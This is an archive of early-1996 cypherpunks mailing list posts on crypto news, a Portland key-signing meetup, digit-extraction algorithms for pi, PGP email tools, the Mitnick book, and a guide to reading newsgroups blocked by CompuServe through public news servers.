For more information on the location, visit:

http://www.teleport.com/~habit/ 

We will be having a key signing and other activities, as well as general
socializing.  Bring information on projects you are pursuing or questions you
would like to ask.

Please leave your cameras and other photographic equiptment at home as some
of the people attending are pretty camera shy.  (And not shy about informing
you of it...)

It looks like we will be getting people outside of the Portland metro area
attending as well.  (I have heard from at least one person from the Bay area 
and one from Seattle, so who knows how many will show up.)

If you want to be on the information list for this, just send me e-mail at
alano@teleport.com.

If all goes well, this may turn into a regular thing...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO19CuQCP3v30CeZAQGi+wf+N7HUDRpgP40SDZHcHlGLk2ApMrQhfAKM
9zxYzphkuqNqNfQB1+b+EFb4dYGOJUcE+DScCbmZMFdy4k9xY78z3Lc3aGFQz4uS
ALuPh2T4jbe3rqqJq0aqM/mHlYD63oMi1/aZNMLRmGb7UVMUiGvulYaWI6GBiZVz
rMTrmKdQ/2jEzZRpCWbyVCa8X04QY3XnH2nP2s/nDgWyZl9Y87KXN44BizRKfde/
9x/vWf3mceVa1e09YHwQEwzZNFBvIGlpM4XWLkxh12QeQGCu08CvfJo3dSL0OU/u
nRlaBO7IqLH90Ejv0/bLRuI0G3jKXb6yZxexORl6+PUbmwusIeaWIA==
=qpD8
-----END PGP SIGNATURE-----


Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 6 Jan 1996 04:34:29 +0800
To: cypherpunks@toad.com
Subject: Re: RSA's Art gallery is now on the web
Message-ID: <2.2.32.19960105194639.0096ea60@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:57 AM 1/5/96 PST, you wrote:
>        Are you tired of the clip art you downloaded last week?  Do you
>need a new background screen for you PC?  Does your cubicle need something
>to give it character?
>        Look no further.  Visit the RSA Data Security Art Gallery and
>download to your hearts content.  

BTW, the URL for this is:

http://www.rsa.com/rsa/gallery/gallery.htm

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 6 Jan 1996 05:13:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Representations of Pi, etc.
Message-ID: <m0tYICf-00090EC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 PM 1/4/96 -0800, you wrote:
>At 3:19 AM 1/5/96, jim bell wrote:
>
>>But BTW, isn't it interesting, that news item from a few weeks ago, on an
>>algorithm for determining individual bits in Pi, regardless of whether
>>you've calculated all the previous ones.  Only problem is, it only works in
>>hexadecimal (and, obviously, binary, etc, not decimal.
>                                           ^^^^^^^^^^^

>???
>
>I didn't see this result you mention, but it surprises me.

And practically everybody else, I'm sure!  It was  written up in Science
News magazine, BTW.

>The part about how it works in some bases, but not in decimal.

Well, by definition if it works in hex, it'll work in octal, "quadal" (?),
binary, etc.  That's ASSUMED, since they would be subsets (co-sets?) of each
other.

>The "hand-waving" (motivational/informal) explanation for why I am
>surprised is that "Nature doesn't care about bipeds with 10 digits vs.
>bipeds, or whatever, with 2 digits or 16 digits." That is, results
>applicable in base 16, hexadecimal, should be easily applicable in base 10.

Yeah, well, I understand your frustration, but to me the really amazing part
is that the elephant flies at all, and not how well he flies (<G>)  (In
other words, the amazing thing is that there is a predictable relationship
in ANY base system)  Chances are the thing WON'T work in base
3,5,6,7,9,10,11,12,13,14,15, and any other non 2**n base.  Or, at least, it
will take a DIFFERENT equation to work in those other bases, if they work at
all.


>And there is are interesting properties about the distribution of digits in
>"random" numbers. Pi is of course not random by many definitions, but
>shares certain important properties with random numbers. (Or sequences, if
>you wish.) One of these is properties is that of _regularity_, the
>frequency of digits. A regular number is one whose expansion has in the
>limit the same frequency for all digits, and this is so in any base. Thus,
>a regular number has an equal frequency (in the limit, blah blah) of 0s,
>1s, 2s, 3s, etc. And switching to another base will not change this.

Not "regular," you used the wrong term.  As a mathematician's term of art,
this is called "normal." In other words, equal numbers of digits 0-9, equal
numbers of digit pairs 00-through 99, equal number of digit triplets
000-999, etc.  A series of random numbers, by definition, must be "normal."
But "Normal" numbers do not necessarily have to be random.  As you might
expect, however, testing for "normality" is a good first test of "randomness." 

(I'm not a mathematician, and I don't play one on TV.  Don't be overly
impressed with the preceeding knowledge; I'm sure there are dozens if a
hundred people reading cypherpunks who know more math than I do. I only got
a 780 on the math portion of my SAT, 20 years ago...  790's and 800's
weren't all that uncommon.) 

>I recollect that pi has been proved to me regular, i.e., that pi has an
>equal frequency of all digits, in the limit, in all bases.

Yes, pi is apparently "normal."  (at least four the first 4 billion or so
digits...)

>(This is the sense in which we can argue that pi is "random." in the sense
>that there are no correlations, no dependence of the n+1th digit on the nth
>digit, and "no apparent order." Furthermore, there is no effective
>compression of pi, except by some tricks, such as _naming_ it (a dictionary
>compression, of sorts) or by specifying a program which computes it. Lots
>of interesting issues about the real meaning of randomness and
>compressability, about the "logical depth" of certain computations, etc. I
>recommend "The Universal Turing Machine" (ed. by Haken, as I recall) for a
>nice set of articles on these fascinating issues.)

Of course, I'm not sure of the ramifications of this new discovery
(individual-digit computability of pi) on the facts you list...  (for
example, inter-digit dependence)   However, if the digital representations
of the digits of pi were indeed still individually "random" and they could
be individually computed rapidly enough, at least hypothetically you could
use the digits of pi as a "one-time-pad".  Obviously, everyone would know
(at least, conceptually) the ENTIRE CONTENT of the pad; the only issue would
be the location where you started.  If the starting point was the key, and
could be defined by a number of at least, say, 256-bits long, it might be a
replacement for IDEA whose current length is fixed at 128 bits. 

I suppose the problem with this technique will probably be that it would
take too long to calculate the (a number somewhere around 2**256) bit of pi,
and for an n-bit message you'd have to do this n times.  

>In summary, I would be surprised to find that a method for calculating the
>Nth digit of pi works for base N but not for base M (modulo some minor
>efficiency factors related to machine architecture, etc.).

I'm sure somebody else will have seen it.  It was in Science News in the
last couple of months, as I recall.  Some kind soul will probably type it
in.  Maybe I can even retrieve my copy from my sister.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 6 Jan 1996 08:57:38 +0800
To: cypherpunks@toad.com
Subject: http://www.rsa.com/rsalabs/cryptobytes/
Message-ID: <9601051755.AA04835@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


FYI.

---------- Begin Forwarded Message ----------
From: <Jueneman@gte.com>
Message-ID: <30ED605E-00000001@wotan.gte.com>
Date: Fri, 05 Jan 1996 12:31:08 EST
Subject: Recent cryptographic findings
To: ietf-pkix@tandem.com

For those who may not have seen it, the most recent issue of CryptoBytes (Vol1, 
No. 3) put out by RSA Laboratories has a wealth of information in it.  I have 
not had the time to fully digest the importance of all of the articles, but in 
the first one Adi Shamir has proposed an "unbalanced RSA" variant of RSA which 
"makes it possible to increase the modulus size from 500 bits to 5,000 bits 
without any speed penalty."

Another article discusses means of deliberately constructing collisions (due to 
Hans Dobbertin of the German Information Security Agency) when using MD4, and 
concludes that "where MD4 is in use, it should be replaced." So far, at least, 
it appears that MD5, RIPEMD, and SHA-1 would resist this kind of attack, but a 
certain amount of nervousness might be in order.

(Hugo Krawczyk of IBM Research and I considered some of these possibilities in 
conjunction with work we did on the SEPP protocol, which uses a salted hash 
function  as a means of confirming the knowledge of a secret to a third party 
without having to use encryption. We were concerned that collisions might be 
possible, and also that it might be possible to partially reverse a hash 
function and glean at least information about the message that was being 
hashed, (the credit card number) in the case of a very short message. We ended 
up proposing a combination 140-bit hash function which includes both MD5 and 
SHA-1, assuming that it would be much more difficult to break both algorithms 
than just one. I will post the analysis to this list in a subsequent message.)

Finally, Burt Kalisky provides a compendium of some of the possible attacks 
against RSA, and discusses simple and practical countermeasures.

It seems to me that the most important of the various attacks involve the 
encryption and decryption of small messages. Since small messages are 
frequently generated for key exchange and for signature purposes, it is 
important that we consider these issues carefully. In particular, the use of 
pseudo-random padding for both encryption (a la the Bellare-Rogaway Optimal 
Asymmetric Encryption Padding) seems very beneficial, and padding is also 
important in the signature block.

This group certainly ought to examine these issues very carefully, and we 
should probably give serious consideration to adopting OAEP for message 
encryption and key exchange. I believe we should also give serious 
consideration to a increased length message digest function such as SHA-1, and 
perhaps incorporate the use of multiple message digest algorithms for 
particularly important signatures , e.g., CA certificates.

The back issues of CryptoBytes are available at 
http://www.rsa.com/rsalabs/cryptobytes/.


Bob

----------------------------
Robert R. Jueneman
GTE Laboratories
1-617-466-2820 Office

"The opinions expressed are my own, and may or may not
reflect the official position of GTE, if any."

----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Jan 1996 05:17:52 +0800
To: cypherpunks@toad.com
Subject: Idiot's Guide to News via Compuserve
Message-ID: <2.2.32.19960105181132.006a4c74@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Idiots Guide to Reading Banned Newsgroups via CompuServe

CompuServe (alone among the Big Three) gives all subscribers a PPP
connection to the Net through any CIS node (including those in Germany).
This is a real Net connection that makes it possible to use CIS to fully
access all the Net's resources including "banned" newsgroups.

A Point-to-Point Protocol (PPP) connection makes your computer just another
machine on the Net for the time you are connected.  Anything that any
Net-connected machine can do, you can do.  The CompuServe Dialer (formerly
CompuServe Internet Dialer) software that has been included with WINCIM at
least since version 1.4 gives you a PPP connection but you need additional
newsreading software to dodge CompuServe restrictions.

So for real beginners, here is how you can use your CompuServe account to
access  banned newsgroups as well as the rest of the Internet.  These
instructions are for Windows users.  MAC users can do the same things but I
don't know the available MAC software.

1)  Get the latest copy of WINCIM.  GO WINCIM (hit Ctrl-G and type WINCIM in
the dialog box) from within CIS.  Download is free.  Install it according to
the instructions and make sure that you can log on to CIS.

2)  Next, let's get a copy of Freeagent which is a free usenet newsreader
which works with CompuServe's own Internet connection software.  Log on to
CIS.  GO FTP or:  Click the Internet icon, click the File Downloads (FTP)
icon and proceed to the main FTP screen.  Click the Access a Specific Site
button.  

3)  Enter ftp.forteinc.com in the Site Name box and /pub/free_agent in the
Directory box.  Click OK and you should see some site login information.
Click OK again and you should see a check box next to the file name
fagent10.zip.  Click the check box and then click the Retrieve button.
Wincim will show you that it will save the file in the Compuserv\download
directory on your hard drive.  (Remember where it's going.)  744279 bytes
later, you will have a copy of Freeagent.

4)  Move the file fagent.zip into a directory by itself (C:\AGENT for
example).  Unzip it with Pkunzip or one of the many zip utilities available
on CIS.

5)  What you are going to do is to connect directly to the Internet via
CompuServe and read usenet newsgroups using Freeagent.  In order to do that,
you will need to find a site somewhere on the Net that will let you read
Usenet News for free or you will have to obtain an account on another
Internet-connected machine.

6)  Community ConneXion (c2.org) will give a month of free service to
CompuServe members suffering from censorship.  For information send email to
uncensored@c2.org.  After your free month, c2.org costs only $7.50 a month
for accounts accessed via the Internet.  

7)  There are some news servers out there that are open to the public.  A
news server is just a machine connected to the Internet that stores and
forwards Usenet news.  The IP addresses of two of the open news servers are
198.70.185.5 and 205.139.39.1.  Once you become a sophisticated user of the
nets, you can use your Web Browser to pick up a longer list of open news
servers at http://dana.ucc.nau.edu/~jwa/open-sites.html.

8)  Now back to Free Agent to grab those banned newsgroups.  In your WINCIM
directory (maybe in a subdirectory called \cid), click cid.exe to start
CompuServe (Internet) Dialer or find the phone-shaped dialer icon in your
CompuServe group window.  Inside the Dialer, hit dial to log on to the Internet.

9)  Start Free Agent.  Click Accept to accept the license agreement.  It
will prompt you to enter various information including the address of the
news server you want to use, your email address, and other info.  All that
you have to enter is the address of a news server.  In the box labeled "News
(NNTP) Server:" enter one of the IP addresses of open news servers
(198.70.185.5, 205.139.39.1, or another from the list) or the address of the
news server of a system you've opened an account on (news.c2.org, for example).

10)  Freeagent will ask you if it's OK to retrieve a list of news groups
from the server.  Click Yes.  Free agent will then tell you that it is
Retrieving complete List of Groups.  Once that's finished you'll be ready to
read all the newsgroups you want and neither CompuServe nor the Bavarian
prosecutor will have anything to say about it.

"The Internet belongs to no one except its users."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 6 Jan 1996 06:37:19 +0800
To: cypherpunks@toad.com
Subject: Pi Stuff
Message-ID: <199601052115.NAA17798@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Various amazed people on the Pi thread wrote:

 > But BTW, isn't it interesting, that news item from a few
 > weeks ago, on an algorithm for determining individual bits
 > in Pi, regardless of whether you've calculated all the
 > previous ones.  Only problem is, it only works in
 > hexadecimal (and, obviously, binary, etc, not decimal.

 > I didn't see this result you mention, but it surprises me.

 > Yeah, well, I understand your frustration, but to me the
 > really amazing part is that the elephant flies at all, and
 > not how well he flies (<G>) (In other words, the amazing
 > thing is that there is a predictable relationship in ANY
 > base system) Chances are the thing WON'T work in base
 > 3,5,6,7,9,10,11,12,13,14,15, and any other non 2**n base.
 > Or, at least, it will take a DIFFERENT equation to work in
 > those other bases, if they work at all.

A few quick comments.  The notion that one might be able to
compute digits of Pi efficiently at any starting point in the
number is not late-breaking news.  The Chudnovsky brothers
developed a formula which permitted them to do this a number of
years ago, and used it to compute Pi to several billion digits.
Prior to that time, the Borweins' quartic interation based on
Ramanujan's modular identities and AGM techniques was the
existing state of the art.

Given a base, d, and an finite ordinal, i, the function which
computes the ith digit of the Pi in the base d is certainly a
computable one.  If we can find an algorithm for computing this
function whose time as a function of "i" does not include the
time required to compute all previous digits, then we are to a
certain extent evaluating individual digits of Pi without
calculating the previous ones.

One should keep in mind, however, that the degree to which such
things are true for algorithms lies on a continuum, with a
near-constant number of arithmetic operations at one end, and a
geometric progression at the other.  So it is not the classic
either/or situation.  Good algorithms whose times are tractable
functions of "i" are certainly desirable, and have been
discovered.

Someone suggested that radix conversion was a time-consuming
operation.  Modern FFT-based algorithms can do multiplication,
division, Nth root, reciprocal, and base conversion in
near-linear time.

Doubtless good algorithms to compute the Nth digit of Pi in any
base do exist, but their form may not be as obvious as those for
trivial bases, such as powers of two.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sat, 6 Jan 1996 07:04:07 +0800
To: cypherpunks@toad.com
Subject: An open letter to Commtouch
Message-ID: <199601052139.NAA20363@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi Commtouch people,

   I am intrigued and hopeful about your secure e-mail product, Pronto
Secure. However, I am puzzled about its support for POTP encryption.

   The other encryption protocols (PGP, PEM, MOSS, and S/MIME) have
all been reviewed carefully by outside experts, and there is general
consensus that these protocols embody state-of-the-art cryptographic
technology, and that there are no known major security flaws. POTP
stands out on your list because such a review has not been carried
out. In fact, grave doubts have been raised regarding its security,
and (to my taste, anyway) not satisfactorily answered.
   I do not wish to raise those points here, nor do I wish to claim
here that POTP is insecure. However, I believe the reputation of your
product is drawn into question by association. Should POTP be
definitively demonstrated to be weak, then it would not be the case
that using your product according to the instructions would provide
"security." Further, I would consider it slightly misleading to
describe it as "mission-critical."

   I feel the situation is analogous to that of a hypothetical
networking company claiming that their product delivers high bandwidth
by offering the choice of ATM, Myrinet, 100Mbps Ethernet, or string
and tin cans.

   That said, I applaud your multiprotocol approach in general. In
fact, I feel it is the future of Internet security tools. I hope your
product gains widespread acceptance, and helps to further the cause of
deployment of strong crypto.

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Sat, 6 Jan 1996 04:30:43 +0800
To: cypherpunks@toad.com
Subject: Scaling Web-of-Trust
Message-ID: <30ed7ecd005b002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the noise, someone had emailed a while ago with the URL for
a paper on scaling the web of trust for PGP, and I've lost the
email.  If whomever it was could resend the information, I'd be
most appreciative.

Thanks.
-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Sat, 6 Jan 1996 03:11:14 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve grovels to foreign censors
Message-ID: <2.2.32.19960105184756.00681e94@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:56 AM 1/5/96 -0500, Larry Sudduth wrote:

>Attachment Converted: C:\WORK\WINMAIL.DAT

What, pray tell, is this?

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 6 Jan 1996 04:20:03 +0800
To: John Young <jya@pipeline.com>
Subject: Re: New Mitnick Book
In-Reply-To: <199601032306.SAA07090@pipe3.nyc.pipeline.com>
Message-ID: <Pine.BSF.3.91.960105143117.3015B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jan 1996, John Young wrote:

>    Jonathan Littman, an investigative reporter, has published
>    "The Fugitive Game: Online With Kevin Mitnick," Little
>    Brown, 1996. 381 pp. $23.95. ISBN 0-316-52858-7.
> 
>    It is a dramatic recount of Mitnick's exploits; the pursuit
>    <snip> 
>    Littman ends with this letter from Markoff and Shimomura:
> 
>    October 8, 1995
>    Jonathan Littman
>    38 Miller Avenue Suite 122
>    Mill Valley, California 94941
> 
>    Dear Jonathan,
>    <snip> 
>    Tsutomu's decision to tell John Markoff that he was
>    travelling to Raleigh on Sunday morning was done without
>    contact with any law enforcement agency. Markoff flew to
>    Raleigh independently six hours later after discussing the
>    possibility of a story with his editors at the New York
>    Times. Markoff did not at any time assist or participate in
>    any aspect of the investigation into Kevin Mitnick's
>    activities; Markoff was there only as an observer in his
>    role as a newspaper reporter.
>    <snip> 
>    Tsutomu never told anyone from law enforcement that anyone
>    had authorized or cleared Markoff's presence in Raleigh.
>    
FWIW:  When Markoff showed up with Tsutomu, the FBI agents "assumed" that 
he was there with Tsutomu as a fellow researcher/grad 
student/assistant/whatever.
  
They had no idea (initially) that he was with the media.  

...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Jan 1996 04:21:14 +0800
To: Gordon Campbell <cypherpunks@toad.com
Subject: Re: Compuserve grovels to foreign censors
Message-ID: <2.2.32.19960105193754.006aa0cc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:47 PM 1/5/96 -0500, Gordon Campbell wrote:
>At 12:56 AM 1/5/96 -0500, Larry Sudduth wrote:
>
>>Attachment Converted: C:\WORK\WINMAIL.DAT
>
>What, pray tell, is this?
>

When a MS Mail attachment wanders around the world, it is accompanied by a
data file of some kind.  That is winmail.dat.  So every MS MAIL attachment
is really two attachments.  Try to ignore it.

DCF

"Windoz.  It may not be an operating system but at least it's out there on
the hardware."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Jan 1996 04:49:59 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: New Mitnick Book
Message-ID: <2.2.32.19960105200208.006a8900@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:36 PM 1/5/96 -0500, Brian Davis wrote:
>FWIW:  When Markoff showed up with Tsutomu, the FBI agents "assumed" that 
>he was there with Tsutomu as a fellow researcher/grad 
>student/assistant/whatever.
>  
>They had no idea (initially) that he was with the media.  
>
>...
>

I take it that you were in the vicinity?  Or is this just what you've heard?
Any more iside tidbits on the bust?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 6 Jan 1996 04:50:59 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: New Mitnick Book
In-Reply-To: <2.2.32.19960105200208.006a8900@panix.com>
Message-ID: <Pine.BSF.3.91.960105150132.3015D-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jan 1996, Duncan Frissell wrote:

> At 02:36 PM 1/5/96 -0500, Brian Davis wrote:
> >FWIW:  When Markoff showed up with Tsutomu, the FBI agents "assumed" that 
> >he was there with Tsutomu as a fellow researcher/grad 
> >student/assistant/whatever.
> >  
> >They had no idea (initially) that he was with the media.  
> >
> >...
> >
> 
> I take it that you were in the vicinity?  Or is this just what you've heard?
> Any more iside tidbits on the bust?
>
I spoke to one of the case agents who was in on the bust while at a 
Computer Crime Conference at Quantico.  I don't recall any other tidbits 
at the moment, but I'll think about it again.  They were fairly 
closemouthed about the whole thing because it was reasonably soon after 
the arrest and the case was just getting going (that is, the "case" in 
court, not the "matter" under investigation -- U.S. Attorney-speak).

EBD
 
> DCF
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ng Pheng Siong <ngps@cbn.com.sg>
Date: Fri, 5 Jan 1996 23:34:14 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Windows Eudora and PGP
In-Reply-To: <2.2.32.19960104183919.00677094@arn.net>
Message-ID: <Pine.SOL.3.91.960105150130.26964A-100000@cbn.cbn.com.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jan 1996, David K. Merriman wrote:
> I've gotten ahold of the WPGP mentioned here a couple days ago, and it seems
> to be working just fine, for me. Even easier to use than PIdaho, though not
> quite as 'full-featured' (ie, remailer support, etc).

Aegis, which was mentioned on this list some months ago, is the best
of the lot, IMHO. No remailer support: You can talk to a remailer from 
an email program. ;)

- PS
--
Ng Pheng Siong <ngps@pacific.net.sg>
NetCentre Pte Ltd * Singapore

Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Jan 1996 05:16:20 +0800
To: cypherpunks@toad.com
Subject: Idiot's Guide to News via Compuserve
Message-ID: <2.2.32.19960105203138.006a306c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Idiots Guide to Reading Banned Newsgroups via CompuServe

CompuServe (alone among the Big Three) gives all subscribers a PPP
connection to the Net through any CIS node (including those in Germany).
This is a real Net connection that makes it possible to use CIS to fully
access all the Net's resources including "banned" newsgroups.

A Point-to-Point Protocol (PPP) connection makes your computer just another
machine on the Net for the time you are connected.  Anything that any
Net-connected machine can do, you can do.  The CompuServe Dialer (formerly
CompuServe Internet Dialer) software that has been included with WINCIM at
least since version 1.4 gives you a PPP connection but you need additional
newsreading software to dodge CompuServe restrictions.

So for real beginners, here is how you can use your CompuServe account to
access  banned newsgroups as well as the rest of the Internet.  These
instructions are for Windows users.  MAC users can do the same things but I
don't know the available MAC software.

1)  Get the latest copy of WINCIM.  GO WINCIM (hit Ctrl-G and type WINCIM in
the dialog box) from within CIS.  Download is free.  Install it according to
the instructions and make sure that you can log on to CIS.

2)  Next, let's get a copy of Freeagent which is a free usenet newsreader
which works with CompuServe's own Internet connection software.  Log on to
CIS.  GO FTP or:  Click the Internet icon, click the File Downloads (FTP)
icon and proceed to the main FTP screen.  Click the Access a Specific Site
button.  

3)  Enter ftp.forteinc.com in the Site Name box and /pub/free_agent in the
Directory box.  Click OK and you should see some site login information.
Click OK again and you should see a check box next to the file name
fagent10.zip.  Click the check box and then click the Retrieve button.
Wincim will show you that it will save the file in the Compuserv\download
directory on your hard drive.  (Remember where it's going.)  744279 bytes
later, you will have a copy of Freeagent.

4)  Move the file fagent.zip into a directory by itself (C:\AGENT for
example).  Unzip it with Pkunzip or one of the many zip utilities available
on CIS.

5)  What you are going to do is to connect directly to the Internet via
CompuServe and read usenet newsgroups using Freeagent.  In order to do that,
you will need to find a site somewhere on the Net that will let you read
Usenet News for free or you will have to obtain an account on another
Internet-connected machine.

6)  Community ConneXion (c2.org) will give a month of free service to
CompuServe members suffering from censorship.  For information send email to
uncensored@c2.org.  After your free month, c2.org costs only $7.50 a month
for accounts accessed via the Internet.  

7)  There are some news servers out there that are open to the public.  A
news server is just a machine connected to the Internet that stores and
forwards Usenet news.  The IP addresses of two of the open news servers are
198.70.185.5 and 205.139.39.1.  Once you become a sophisticated user of the
nets, you can use your Web Browser to pick up a longer list of open news
servers at http://dana.ucc.nau.edu/~jwa/open-sites.html.

8)  Now back to Free Agent to grab those banned newsgroups.  In your WINCIM
directory (maybe in a subdirectory called \cid), click cid.exe to start
CompuServe (Internet) Dialer or find the phone-shaped dialer icon in your
CompuServe group window.  Inside the Dialer, hit dial to log on to the Internet.

9)  Start Free Agent.  Click Accept to accept the license agreement.  It
will prompt you to enter various information including the address of the
news server you want to use, your email address, and other info.  All that
you have to enter is the address of a news server.  In the box labeled "News
(NNTP) Server:" enter one of the IP addresses of open news servers
(198.70.185.5, 205.139.39.1, or another from the list) or the address of the
news server of a system you've opened an account on (news.c2.org, for example).

10)  Freeagent will ask you if it's OK to retrieve a list of news groups
from the server.  Click Yes.  Free agent will then tell you that it is
Retrieving complete List of Groups.  Once that's finished you'll be ready to
read all the newsgroups you want and neither CompuServe nor the Bavarian
prosecutor will have anything to say about it.

"The Internet belongs to no one except its users."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff klein <geoff@commtouch.co.il>
Date: Fri, 5 Jan 1996 22:14:02 +0800
To: cypherpunks@toad.com
Subject: Fw: Re: [NOISE] Trying to init security channel
Message-ID: <9601051337.AA26973@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain


On 4 Jan 1996 19:40:39 futplex posted the message included below:

1. My apologies to all for the original accidental posting to this list.

2. futplex: "Another satisfied "Power One Time Pad" user, it would         
   appear...."
Things are not always quite the way they appear, Commtouch are the 
developers of Pronto Secure, - a pretty good Windows e-mail client 
providing security services using PGP (or POTP). Lookout for a beta release 
announcement in early February.


Geoff Klein 
Product Manager - Pronto Secure 
http://www.commtouch.com
*Welcome to the post of Cypherpunk censor - Now Go Home & change your sig.*

-----Begin Included Message ----- 

Date: Thu, 4 Jan 1996 19:40:39 -0500 (EST)
 From: futplex@pseudonym.com (Futplex)
To: cypherpunks@toad.com (Cypherpunks Mailing List) 
Cc: 

-----BEGIN PGP SIGNED MESSAGE-----

Forwarded message:
> Date: Thu, 4 Jan 96 13:11:36 IST
> From: geoff klein <geoff@commtouch.co.il>
> To: cypherpunks@toad.com
> Subject: Trying to init security channel
> X-Potpinitrequest: 
AwAAAAAAAADhi+swAQAAAPqPQh4AACoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARjMwMzBGRjI
yMTFENTBEMABnZW9mZkBjb21tdG91Y2guY28uaWwAY3lwaGVycHVua3NAdG9hZC5jb20A

Another satisfied "Power One Time Pad" user, it would appear....

> 
>       This message was sent by Pronto Secure Mail.
>       Without Pronto you can not establish a secure channel.
>
>       Please send a reply manually.

Futplex <futplex@pseudonym.com>
*** Welcome to Cypherpunks -- Now Go Home ***

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOxzMinaAKQPVHDZAQGcIwf+KYlU8PiutVTduMG2Jxt7KDsEhDvjjiDi
p+kBKw0y2Tj+Z/LGoCTSu2egMxFf9L9mWg8ulNCXPu92Bg1PWNPFJpTeXYcQfHnz
fQfQlbnixwo1gU1DW0AVpeq5iIdBwOOqh2TEa5m7LQXiCU3RDS0Q0+muDzvncykC
UkF+uzPvxrZW88LFnxSmYez3o/Xj0V39gvKANkZvqOotm90g5bYb6TY8qCUFfSUh
hNPPA1irtYc96a73WXRYciW4T1H8cfsmmlwMxbCbILer6MPH+2CZMD1DP5eIu0cd
4vvN6n3pPgBs7YAp4RANf6HKHZpJwB/MG+TOt2ngolsPt5JFvrUKuQ==
=wXVD
-----END PGP SIGNATURE-----

 .


---- End of forwarded message ----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 6 Jan 1996 05:40:55 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Idiot's Guide to News via Compuserve
In-Reply-To: <2.2.32.19960105203138.006a306c@panix.com>
Message-ID: <199601052055.PAA24269@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Duncan Frissell <frissell@panix.com> writes:
> Idiots Guide to Reading Banned Newsgroups via CompuServe
[...]

I have just put an HTMLized version of the full text on my web pages at
<a href="http://www.cs.umass.edu/~lmccarth/cypherpunks/banned.html">
http://www.cs.umass.edu/~lmccarth/cypherpunks/banned.html</a>

Feel free to distribute this URL widely. Please send any comments on the
HTMLizing etc. to me; comments on the content of the guide to Duncan.

Lewis McCarthy

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMO2QI2f7YYibNzjpAQF1pgQAyNnUHYiNQunBRdwW81oDNbfV1ybvxZeK
yiUHrB8dz+vF3O09Kh2xBEyyBv+ly7nrRD1Ki/tY2DlRHUY7kLWe6Cl5jbvluMIv
